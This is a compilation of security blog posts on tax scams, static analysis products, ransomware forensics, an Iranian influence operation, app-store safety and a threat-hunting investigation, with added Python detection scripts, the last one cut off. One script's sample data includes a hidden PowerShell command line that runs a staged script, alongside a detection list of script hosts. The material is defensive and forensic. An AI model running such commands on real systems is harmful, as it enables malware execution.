A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or as government bureaus. This tactic is pretty effective due to Americans’ concerns about misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.

Robocalls

Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail-mail or in-person, not over the phone.

Emails

Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.

Phony CPAs

Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but not signing the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned, or apply changes that will get them in trouble with the IRS. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.

While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:

  • File before a scammer does it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a fraudster.
  • Obtain a copy of your credit report. You’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every few months and check for any suspicious activity.
  • Beware of phishing attempts. Phishing is a common tactic crooks leverage during tax season, so stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double-check their legitimacy. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If your data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blogs.

Veracode’s New Scan Type Delivers Results at DevSecOps Speed

Across the thousands of customer conversations we have each year, one theme continues to emerge regardless of industry, size, or geography: the pace of development is accelerating rapidly, and the pressure to innovate quickly is more intense than ever before. Veracode’s customers are not alone. A recent GitLab survey across more than 4,000 global developers found that 43 percent of teams now deploy on demand or multiple times a day, and nearly the same percentage, 41 percent, deploy between once a day and once a month.

In response to this development evolution, Veracode is evolving as well. Security testing that can’t keep up or, worse, slows developers down, will be under-utilized or ignored in this fast-paced environment. In turn, we’re announcing the latest evolution of our Static Analysis solution, in which we’re bringing together two existing scan types and introducing a new, first-of-its-kind scan type. The result is a comprehensive Static Analysis product family that is optimized to integrate security testing into every stage of the development pipeline, giving teams the right scan, at the right time, in the right place.

Veracode's Static Analysis family

IDE Scan

From the first line of the code, the IDE Scan provides focused, real-time security feedback to developers as they code. This scan, which returns results within seconds, helps developers remediate faster through code examples and reinforces secure coding skills as they work with visual positive reinforcement. Companies using the IDE Scan have reduced flaws introduced into new code by 60 percent.

Pipeline Scan

Results of Veracode Pipeline Scan

The first of its kind in the market, the new Pipeline Scan runs on every build, providing security feedback on the code at the team level, with a median scan time of 90 seconds. This scan directly embeds into teams’ CI tooling and provides fast feedback on flaws being introduced on new commits. Teams can break the build if policy-violating flaws, based on severity or CWE category, are introduced on a commit or net-new security issues are found. Because this scan is built in line with best-in-class CI tooling, there is no learning curve for development.

Policy Scan

Before releasing the software, a Policy Scan completes a full assessment of the code, with an audit trail for compliance purposes, in a median scan time of 8 minutes. This scan evaluates applications against security policy, delivering a clear pass/fail result. Security teams and development managers gain broad visibility across their applications and the continuous feedback they need to proactively improve their overall security posture.

Each scan runs on the Veracode Static Analysis Engine, which had a developer-verified false positive rate of less than 1.1 percent across more than 7 million scans in 2019, without manual tuning. Teams benefit from the assurance that they are getting consistent, accurate results alongside clear guidance on what issues to focus on and how to fix them faster, without compromising on development velocity.

Putting it into practice

After struggling with a center of excellence approach, the security team at one of our customers, a large telecommunications firm, supported development by providing them access to a variety of different static analysis solutions. While they were empowered by tooling choice, the development team still wasn’t having success remediating risk or scaling the program and was frustrated with inconsistent results.

The development team decided to standardize on one solution and, upon completion of a thorough assessment process, selected Veracode. Using a combination of scanning with Veracode Static Analysis across the SDLC, they were able to scale the program to more than 1,300 applications, resolve more than 270,000 security flaws, and reduce the number of new flaws introduced by more than 60 percent, all in just 90 days.

Learn more

To get more details on Veracode Static Analysis, download our technical whitepaper.

CSI: Evidence Indicators for Targeted Ransomware Attacks – Part I

For many years now I have been working and teaching in the field of digital forensics, malware analysis and threat intelligence. During one of the classes we always talk about Locard’s exchange principle: “with contact between two items, there will be an exchange”. If we translate that to the digital world: “when an adversary breaches a system, they will leave traces of evidence behind”. The challenge is often how to discover that evidence in a timely manner to take action, and which sources are available for detection. The volatile evidence sources must be secured as soon as possible, while the non-volatile sources have a lower priority. An example of the order of volatility:

Table 1: Order of Volatility

In this series of two articles, you will see an example of a concerning trend we have been observing over the last couple of months.

In the first stage, companies are infected by some sort of information-stealing malware (Azorult, Dridex, Trickbot), or breached by having a weakly secured RDP server at the edge of the network.

Stage two occurs a few weeks later when the same victim is hit by a targeted ransomware campaign using Ryuk, Bitpaymer or another ransomware family the attacker has access to.

A recent example was covered by the team in this article on Bitpaymer. The adversary executing stage one does not necessarily have to be the same as the actor executing stage two. There are plenty of credentials harvested by Azorult or RDP on underground markets. Below is a screenshot from an advertiser demonstrating the number of Azorult victims (13k) they have made, including the information stolen from them:

Figure 1 Azorult C2 example

Stage 1: The Initial Infection

Figure 2 Stage 1

Although there may be some variations, the graphical overview shows how most of these attacks start. Whether through a drive-by compromise, where a user visits a website infected with a malicious script, or through a spear-phishing campaign, the result is a malware infection that steals and exfiltrates credentials, leaving the adversary with valid accounts belonging to the victim. The other scenario is buying valid account information on the underground market. Valid accounts give access to a remote service, or direct access to a victim's machine through the malware. When an adversary makes the next move, 9 out of 10 times we observe the use of a credential dumping tool like Mimikatz, or PowerShell-related activity, again for password dumping. The goal? To obtain local-admin, domain-admin or system rights on a system within the victim's network. The secondary goal we observe with the use of PowerShell tools/scripts is reconnaissance of the network.

Digital Evidence Initial Access stage:

T1189 Drive-By Compromise

In this scenario the victim most likely browses the Internet and visits a webpage that contains a malicious script. Following the order of volatility, where could we discover evidence? Depending on what type of actions are defined in the malicious script, it could leave traces on disk or, when injected, in memory.

T1192 & T1193 Spear-phishing Link/Attachment

In this scenario, the victim receives an email with a link (T1192) or a weaponized attachment (T1193). By clicking on the link, a website is opened, and follow-up actions are executed as described above in the T1189 Drive-by compromise. The order of volatility is similar but will have a larger chain of execution. Since the user initiated the action, more digital evidence will be available on the victim’s machine:

  1. Execution of a program (Email-client)
  2. Clicking on the link will open the default configured Web-browser
  3. Web-browser visits link
  4. Script will execute

For the execution and launch of a program there is process evidence, the Prefetch directory, UserAssist, Shimcache, RecentApps and many more sources to track when programs were launched and executed. The email itself can either be retrieved from the victim's inbox or, in the case of webmail, there may be remnants of it in the Temporary Internet Files. Most of the mentioned evidence artifacts are non-volatile and easy to extract in a forensically sound manner.

In the case of a spear-phishing attack with a weaponized attachment, the flow will look mostly similar to below (of course there are variations):

  1. Execution of a program (Email-client)
  2. Opening attachment
  3. Launch of Office application
  4. Execution of the macro
  5. PowerShell/WMIC followed by Internet traffic downloading file
  6. Execution of script/file
  7. Execution in memory or written to disk and execution

We already discussed the non-volatile evidence available for the execution of a program. In this example there will be evidence for the launch/execution of the email client and the opening of an Office application to execute the attachment. If the attachment was opened directly rather than saved to disk first, Outlook copied the file to the “SecureTemp” folder, a hidden folder under Temporary Internet Files.

Depending on the payload of the macro, evidence will exist of Internet related traffic. When PowerShell or WMIC is used, the launch of it is recorded in the Windows Prefetch directory and there are traces in the registry and/or event logs. Depending on what type of script or file is executed, traces can be discovered in memory or on disk, with memory most volatile and disk non-volatile.
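The attachment chain above (email client, Office application, macro, PowerShell/WMIC) is exactly what process-creation evidence lets an analyst reconstruct. The following is an added example, not code from the McAfee post: it takes Windows Security EID 4688-style "new process created" records, rebuilds parent/child ancestry (binding each child to the most recent creation of its parent PID, so PID reuse does not mislead), and flags any script host whose ancestry contains an Office application. The records, PIDs, user name, paths and timestamps are constructed sample data, not evidence from a real case.

```python
"""Reconstruct the spear-phishing execution chain from EID 4688-style process records.

Added example (not from the McAfee post). All records are constructed sample data.
"""
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime      # time the process was created
    pid: int          # new process id
    ppid: int         # creator (parent) process id
    image: str        # full image path of the new process
    cmdline: str      # command line as logged


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wmic.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


def _name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


# Constructed sample: Outlook -> Word (attachment opened from the Outlook temp cache)
# -> PowerShell, plus an unrelated cmd.exe -> PowerShell chain that must not be flagged.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(_t("2020-02-10T09:00:00"), 700, 1,
              r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(_t("2020-02-10T09:00:05"), 4100, 700,
              r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE"),
    ProcEvent(_t("2020-02-10T09:02:10"), 4312, 4100,
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\jdoe\AppData\Local\Microsoft\Windows\INetCache'
              r'\Content.Outlook\K1Q2W3E4\invoice.doc"'),
    ProcEvent(_t("2020-02-10T09:02:25"), 4388, 4312,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\jdoe\AppData\Local\Temp\stage.ps1"),
    ProcEvent(_t("2020-02-10T09:05:00"), 5200, 700,
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(_t("2020-02-10T09:05:30"), 5300, 5200,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Date"),
]


def parent_of(events: List[ProcEvent], child: ProcEvent) -> Optional[ProcEvent]:
    """Creator record of `child`: the most recent creation of child.ppid at or before
    child.ts, so a later process that reused the PID is not mistaken for the parent."""
    cands = [e for e in events if e.pid == child.ppid and e.ts <= child.ts]
    return max(cands, key=lambda e: e.ts) if cands else None


def ancestry(events: List[ProcEvent], ev: ProcEvent) -> List[ProcEvent]:
    """Chain from the outermost known ancestor down to `ev`."""
    chain, seen, cur = [ev], {ev.pid}, ev
    while True:
        parent = parent_of(events, cur)
        if parent is None or parent.pid in seen:
            break
        chain.append(parent)
        seen.add(parent.pid)
        cur = parent
    return list(reversed(chain))


def find_office_script_chains(events: List[ProcEvent]) -> List[dict]:
    """Script hosts with an Office application somewhere in their ancestry."""
    hits = []
    for ev in events:
        if _name(ev.image) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(events, ev)
        office = [e for e in chain[:-1] if _name(e.image) in OFFICE_APPS]
        if not office:
            continue
        nearest = office[-1]  # the Office process closest to the script host
        hits.append({
            "chain": [_name(e.image) for e in chain],
            "document": nearest.cmdline,  # which file the Office app had open
            "cmdline": ev.cmdline,
            "seconds_after_office": (ev.ts - nearest.ts).total_seconds(),
        })
    return hits


if __name__ == "__main__":
    for hit in find_office_script_chains(SAMPLE_EVENTS):
        print(" -> ".join(hit["chain"]))
        print("   document:", hit["document"])
        print("   cmdline :", hit["cmdline"])
```

The `document` field is the value to pivot on next: the Word command line points at the Content.Outlook cache path (the "SecureTemp" location discussed above), which tells the analyst where the attachment itself should be recovered from.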

When, for example, a malware like Azorult is installed on the victim’s machine, the flow will look like this:

Figure 3 Exfiltration and Communication

The exfiltration of the data is mostly happening over TCP port 80 towards a C2 (command and control) dashboard, as demonstrated in Figure 1. Both T1043 and T1041 are techniques that will most likely leave non-volatile traces behind in network logs from devices like a proxy/gateway/firewall.

What we often notice is that infections with, for example, AZORULT are ignored or underestimated. They are detected, and the infection is either blocked or cleaned up later, but the capabilities of the malware are underestimated or ignored.

If we look again at Table 1, the order of volatility, the timeframe in which we operate is seconds to minutes with regard to initial network traffic and running processes. The time between infection and exfiltration is again in the range of minutes, more than enough to exfiltrate credentials before any action is taken. This is also the delta in which we face the challenge: are our people, processes and technology, combined, capable of responding within this attack window? Anticipating early warning signs and understanding the malware's capabilities can help prevent larger damage.

What happens when the initial compromise results in valid credentials, or in access to the victim through the RAT (remote access Trojan), being used for a targeted ransomware attack? We will discuss that in the next article.

The post CSI: Evidence Indicators for Targeted Ransomware Attacks – Part I appeared first on McAfee Blogs.

Veracode Channel Leader Leslie Bois Earns Top Channel Recognition from CRN

Leslie Bois, Veracode's Vice President of Global Channels and Alliances, has been selected to the esteemed CRN 2020 Channel Chiefs list for the third consecutive year, a reflection of the hard work, growth, and influence she's introduced since joining Veracode in 2017.

Bois is responsible for developing and executing Veracode's global strategy to build a strong partner network, which plays a significant role in the company's go-to-market efforts. She works cross-functionally to align all aspects of the business to help channel partners grow their client list with Veracode's platform of leading application security solutions.

Under her leadership, Veracode's channel pipeline has grown exponentially over the past 12 months, and we're proud to have formed hundreds of partner relationships around the world, including emerging markets such as Asia, Latin America, Europe, and the Middle East. In concurrence with this growth, Veracode is investing significantly in the further development of our global channel initiatives across multiple regions.

“I'm honored to receive this recognition from CRN. I think it's a true testament to the dedication and commitment from Veracode to enable security at the speed of development for companies around the world,” said Bois. “The application security market is gaining momentum, and our focus in 2020 will be continuing to ensure that our partners across the globe are positioned to confidently provide the solutions and training businesses need to secure their software. Through dedicated partner engagement, we aim to bring our best-in-class application security platform to more businesses via our channel network.”

Each of the 2020 Channel Chiefs is the cream of the IT channel crop: leaders who drive the channel agenda and evangelize the importance of channel partnerships. Channel Chief honorees are selected by CRN's editorial staff on the basis of their professional achievements, standing in the industry, dedication to the channel partner community, and strategies for driving future growth and innovation.

“The IT channel is undergoing constant evolution to meet customer demands and changing business environments,” said Bob Skelley, CEO of The Channel Company. “CRN's Channel Chiefs work tirelessly, leading the industry forward through superior partner programs and strategies with a focus on helping solution providers transform and grow. Our team here at The Channel Company congratulates these outstanding individuals for their dedication to the channel.”

Visit here to find out more about partnering with Veracode.

“Distinguished Impersonator” Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).


Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.


Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.


Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.


Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.


Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).


Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.


Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Save the Date for the 11th Annual NICE Conference and Expo

11th ANNUAL NICE CONFERENCE AND EXPO
SAVE THE DATE: November 16-18, 2020
LOCATION: Atlanta, Georgia
Visit the Conference website

We are excited to announce that this year’s Conference and Expo will take place on November 16 - 18, 2020 at the Hilton Atlanta in Atlanta, GA. For more information about the conference, visit niceconference.org

This event is supported by the National Initiative for Cybersecurity Education (NICE), a program of the National Institute of Standards and Technology in the U.S. Department of Commerce, under a Cooperative Agreement (Award# 70NANB18H025). Learn more at

How we fought bad apps and malicious developers in 2019


Posted by Andrew Ahn, Product Manager, Google Play + Android App Safety
[Cross-posted from the Android Developers Blog]

Google Play connects users with great digital experiences to help them be more productive and entertained, as well as providing app developers with tools to reach billions of users around the globe. Such a thriving ecosystem can only be achieved and sustained when trust and safety is one of its key foundations. Over the last few years we’ve made the trust and safety of Google Play a top priority, and have continued our investments and improvements in our abuse detection systems, policies, and teams to fight against bad apps and malicious actors.
In 2019, we continued to strengthen our policies (especially to better protect kids and families), continued to improve our developer approval process, initiated a deeper collaboration with security industry partners through the App Defense Alliance, enhanced our machine learning detection systems analyzing an app’s code, metadata, and user engagement signals for any suspicious content or behaviors, as well as scaling the number and the depth of manual reviews. The combination of these efforts has resulted in a much cleaner Play Store:
  • Google Play released a new policy in 2018 to stop apps from unnecessarily accessing privacy-sensitive SMS and Call Log data. We saw a significant, 98% decrease in apps accessing SMS and Call Log data as developers partnered with us to update their apps and protect users. The remaining 2% are comprised of apps that require SMS and Call Log data to perform their core function.
  • One of the best ways to protect users from bad apps is to keep those apps out of the Play Store in the first place. Our improved vetting mechanisms stopped over 790,000 policy-violating app submissions before they were ever published to the Play Store.
  • Similarly to our SMS and Call Log policy, we also enacted a policy to better protect families in May 2019. After putting this in place, we worked with developers to update or remove tens of thousands of apps, making the Play Store a safer place for everyone.
In addition, we’ve launched a refreshed Google Play Protect experience, our built-in malware protection for Android devices. Google Play Protect scans over 100B apps every day, providing users with information about potential security issues and actions they can take to keep their devices safe and secure. Last year, Google Play Protect also prevented more than 1.9B malware installs from non-Google Play sources.
While we are proud of what we were able to achieve in partnership with our developer community, we know there is more work to be done. Adversarial bad actors will continue to devise new ways to evade our detection systems and put users in harm's way for their own gains. Our commitment in building the world's safest and most helpful app platform will continue in 2020, and we will continue to invest in the key app safety areas mentioned in last year’s blog post:
  • Strengthening app safety policies to protect user privacy
  • Faster detection of bad actors and blocking repeat offenders
  • Detecting and removing apps with harmful content and behaviors
Our teams of passionate product managers, engineers, policy experts, and operations leaders will continue to work with the developer community to accelerate the pace of innovation, and deliver a safer app store to billions of Android users worldwide.

Managed Defense: The Analytical Mindset

When it comes to cyber security (managed services or otherwise), you’re ultimately reliant on analyst expertise to keep your environment safe. Products and intelligence are necessary pieces of the security puzzle to generate detection signal and whittle down the alert chaff, but in the end, an analyst’s trained eyes and investigative process are the deciding factors in effectively going from alerts to answers in your organization.

This blog post highlights the events of a recent investigation by FireEye Managed Defense to showcase the investigative tooling and analysis process of our analysts.

Threat Overview

Recently, FireEye Managed Defense responded to a suspected China-nexus threat group campaign targeting the transportation, construction, and media sectors in Southeast Asia. FireEye’s investigative findings uncovered previously unseen malware, DUOBEAN, a backdoor that solicits additional modules from command-and-control (C2) infrastructure and injects them into process memory.

Initial Lead

Our initial lead for this activity originated from threat hunting in Managed Defense, which identified a ZIP archive containing a malicious LNK file with embedded PowerShell commands to download and inject a malicious payload into victim process memory. The attachment was blocked by a FireEye ETP appliance in Southeast Asia, but network indicators for the payload were extracted for monitoring suspicious infrastructure.

When IP addresses are tasked for monitoring, our network sensors record traffic observed to the suspicious destination for further analysis by our Managed Defense team during threat hunting activities. When new leads from monitored traffic have been collected, our analysts use an internal tool, MDASH, as a dashboard for exploring suspicious network activity.

Analyst Perspective

With mountains of evidence available from endpoint telemetry and network traffic, it’s critical to interrogate artifacts with purposeful lines of questioning in order to respond to threat actor activity as effectively as possible without getting lost in the data.

In this engagement, the initial lead for DUOBEAN activity is a tracked IP address that generated a lead for hunting. Given this type of evidence, there are a few questions we’re interested in answering before looking at the PCAP contents.

Why did we start monitoring this indicator?

The most important action an analyst can take when evaluating any indicator is understanding what it is trying to detect. For FireEye, the monitored network infrastructure is commented by the author to provide necessary context for analysts that review generated leads.

In this case, our team identified that a recent sample of CHAINLNK from a blocked ETP attachment in Southeast Asia beaconed to infrastructure serving the same SSL certificate. Related infrastructure reusing SSL certificates was enumerated when a malicious domain was gathered from the payload and scoped using PassiveTotal to identify SSL certificates associated with the IP. The certificate’s SHA-1 was then searched against PassiveTotal results to identify an additional network asset serving the same certificate. This overlapping certificate use is illustrated in Figure 1.


Figure 1: Suspicious infrastructure observed in hunting activity

How long have we been tracking this IP Address?

IP addresses can be some of the most volatile indicators in the world of security. The operational cost for an attacker to transition infrastructure is nominal, so the accuracy of the indicator will decrease as time marches on.

In this instance, the IP address had only been monitored for seven (7) days which increased the credibility of the indicator given the relative freshness.

What’s the prevalence of this activity?

Prevalence of traffic to an IP address gives us a baseline for normalcy. Large volumes of traffic from many varying hosts in multiple organizations shift our frame of reference to be less suspicious of the activity, while traffic from a few consistent internal hosts at one or a few clients is more consistent with targeted attacker activity.

In this engagement, we observed six (6) hosts from one organization making consistent HTTPS requests (without response) to the infrastructure. This limited scope would be consistent with more suspicious activity.

How frequently is activity being observed?

Frequency of traffic informs an analyst of whether the activity is programmatic or interactive. Identical activity at consistent intervals is not something humans can easily replicate. Although malware regularly uses variable lengths of time for beaconing, consistent outbound requests in cadence are telling us that some programmatic task is occurring to generate the activity, not a user session.

In this engagement, we observed outbound traffic occurring from all six (6) hosts at 15 minute intervals which was indicative of programmatic activity initiating the requests.

How much information is being passed between these hosts?

Strictly looking at netflow information, the byte size and directionality of the traffic will also inform your analysis of what you’re observing. Small, consistently sized outbound packets tend to be more representative of beaconing traffic (legitimate or otherwise), while varied request/response sizes with frequent communication suggest interactivity.

In this engagement, we observed only a few bytes of outbound traffic on each of the hosts, consistent with beaconing.

Without looking at the packets, our line of questioning against the flow data already begins to characterize the content as highly suspicious. Looking at the network capture content (Figure 2), we observe that the outbound traffic gathered is strictly TLS Client Hello traffic to a free domain, which are commonly employed by attackers.


Figure 2: TLS Client Hello from packet capture
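The four questions above (prevalence, frequency, volume, directionality) can be answered from flow records alone, before any packet content is examined. The following is an added example, not FireEye's MDASH or any tooling from the post: it profiles each external destination over netflow-style records and flags destinations that look beacon-like (few internal hosts, a regular cadence, small outbound payloads and no response). The IP addresses, hosts, timings and byte counts are constructed sample data chosen to mirror the shape described in the post (six hosts, 15-minute intervals, Client Hello-sized requests without responses), not data from the investigation.

```python
"""Flow-level triage of a suspect destination: prevalence, cadence and byte profile.

Added example (not FireEye's tooling). All flow records are constructed sample data.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
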